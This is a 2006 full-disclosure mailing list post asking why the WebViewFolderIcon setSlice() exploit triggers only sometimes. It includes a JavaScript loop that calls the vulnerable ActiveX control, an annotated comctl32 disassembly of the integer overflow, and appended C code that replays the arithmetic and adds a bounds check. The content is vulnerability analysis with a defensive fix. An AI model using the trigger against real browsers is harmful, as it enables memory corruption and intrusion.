Message-ID: <de6cc1fe0611230206j724ef456nfa3cdbe45e86ae74@mail.gmail.com>
Date: Thu, 23 Nov 2006 18:06:22 +0800
From: ". Solo" <soloaway@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Regarding WebViewFolderIcon setSlice() Exploit
Hi, all,
Some questions puzzled me.
The exploit: http://www.milw0rm.com/exploits/2448
In the assembly code, it allocs 0 bytes first, and then we can tell it overflows
through the "rep movsd" at ".text:780AA731". In fact, it is required that
the edi must be set to the place where we alloc 0 bytes, if we want to trigger
the vulnerability.
But most of the time it can not be triggered.
I saw the exploit invoke setSlice repeatedly, yet sometimes it can be
triggered through the long "FOR" loop. I can not find the reason why it
can be triggered if it just repeats and repeats; what happens to make the
edi point to the 0-byte place?
Thanks for your help.
for (i = 0; i < 128; i++)
{
    try {
        var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
        tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505, 0x05050505);
    } catch (e) {}
}
.text:780AA6F1 mov ecx, [ebx+10h]          ; ecx = 00000002
.text:780AA6F4 add eax, ecx                ; eax = 80000000
.text:780AA6F6 cdq                         ; edx = FFFFFFFF
.text:780AA6F7 idiv ecx                    ; eax = C0000000 (edx = 00000000)
.text:780AA6F9 mov esi, eax                ; esi = C0000000
.text:780AA6FB mov eax, [ebx+0Ch]          ; eax = 00000010 ([00eaeb34])
.text:780AA6FE imul esi, ecx
.text:780AA701 imul eax, esi
.text:780AA704 push eax                    ; uBytes
.text:780AA705 push dword ptr [ebx+4]      ; hMem
.text:780AA708 call comctl32__ReAlloc      ; Alloc 0 Byte
.text:780AA70D test eax, eax               ; eax is the pointer to the place of "0Byte"
.text:780AA70F jz short loc_780AA73D
.text:780AA711 mov [ebx+4], eax
.text:780AA714 mov eax, [esp+0Ch+arg_4]    ; eax = 7fffffff
.text:780AA718 mov [ebx+8], esi            ; [ebx+8] = 80000000
.text:780AA71B
.text:780AA71B loc_780AA71B:               ; CODE XREF: comctl32__DSA_SetItem+1D.j
.text:780AA71B mov [ebx], edi              ; [ebx] = edi = 7fffffff
.text:780AA71D
.text:780AA71D loc_780AA71D:               ; CODE XREF: comctl32__DSA_SetItem+15.j
.text:780AA71D mov ecx, [ebx+0Ch]
.text:780AA720 mov esi, [esp+0Ch+arg_8]    ; esi = "DCBA", arg_8
.text:780AA724 mov edi, ecx
.text:780AA726 imul edi, eax
.text:780AA729 add edi, [ebx+4]
.text:780AA72C mov eax, ecx
.text:780AA72E shr ecx, 2
.text:780AA731 rep movsd                   ; copy esi to edi, but edi is not always the place where we alloc 0 bytes
.text:780AA733 mov ecx, eax
.text:780AA735 and ecx, 3
.text:780AA738 xor eax, eax
.text:780AA73A rep movsb
.text:780AA73C inc eax
.text:780AA73D
.text:780AA73D loc_780AA73D:               ; CODE XREF: comctl32__DSA_SetItem+3D.j
.text:780AA73D pop edi
.text:780AA73E pop esi
.text:780AA73F pop ebx
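The size arithmetic from the trace above, replayed as an added example that is not part of the original post or of comctl32: the unchecked functions mirror each instruction in 32-bit two's complement with the index 0x7ffffffe from the script (the value the add turns into 0x80000000) and show uBytes wrapping to zero and the edi displacement wrapping as well, while checked_bytes is an assumed hardened form that refuses the index before either product can wrap. CB_ITEM and N_GROW are assumed names for the [ebx+0Ch] and [ebx+10h] fields, with the values the trace records.

```c
#include <stdint.h>
#include <stdio.h>

/* Header fields the disassembly reads via ebx; names are assumed. */
static const int32_t CB_ITEM = 0x10; /* [ebx+0Ch]: bytes per item */
static const int32_t N_GROW  = 2;    /* [ebx+10h]: growth step   */

/* Unchecked growth arithmetic, mirrored in 32-bit two's complement.
 * Returns uBytes, the size pushed to comctl32__ReAlloc. */
static uint32_t unchecked_bytes(int32_t index)
{
    uint32_t eax = (uint32_t)index + (uint32_t)N_GROW; /* add eax, ecx  -> 0x80000000 */
    int32_t esi = (int32_t)eax / N_GROW;               /* cdq; idiv ecx -> signed, 0xC0000000 */
    esi *= N_GROW;                                     /* imul esi, ecx -> 0x80000000 */
    return (uint32_t)CB_ITEM * (uint32_t)esi;          /* imul eax, esi -> wraps to 0 */
}

/* The capacity stored at [ebx+8]: the same esi as above. */
static uint32_t unchecked_maxcount(int32_t index)
{
    uint32_t eax = (uint32_t)index + (uint32_t)N_GROW;
    return (uint32_t)(((int32_t)eax / N_GROW) * N_GROW);
}

/* Displacement added to [ebx+4] before rep movsd (imul edi, eax with
 * eax = index). It wraps too, so the copy is not inside the new block. */
static uint32_t dest_offset(int32_t index)
{
    return (uint32_t)CB_ITEM * (uint32_t)index; /* 0x10 * 0x7ffffffe -> 0xFFFFFFE0 */
}

/* Hardened variant: refuse the request before any step can wrap.
 * Returns the byte count, or 0 when the index is rejected. */
static uint32_t checked_bytes(int32_t index)
{
    uint32_t count;
    if (index < 0 || (uint32_t)index > (uint32_t)INT32_MAX - (uint32_t)N_GROW) return 0;
    count = ((uint32_t)index + (uint32_t)N_GROW) / (uint32_t)N_GROW * (uint32_t)N_GROW;
    if (count > UINT32_MAX / (uint32_t)CB_ITEM) return 0; /* count * cbItem would wrap */
    return count * (uint32_t)CB_ITEM;
}

int main(void)
{
    int32_t idx = 0x7ffffffe; /* first setSlice() argument in the script above */
    printf("uBytes=%#x newmax=%#x dest_offset=%#x checked=%#x\n", unchecked_bytes(idx),
           unchecked_maxcount(idx), dest_offset(idx), checked_bytes(idx));
    return 0;
}
```

With a small index such as 5, checked_bytes returns the normal rounded-up size (0x60), so the check only rejects requests whose intermediate products would no longer fit in 32 bits.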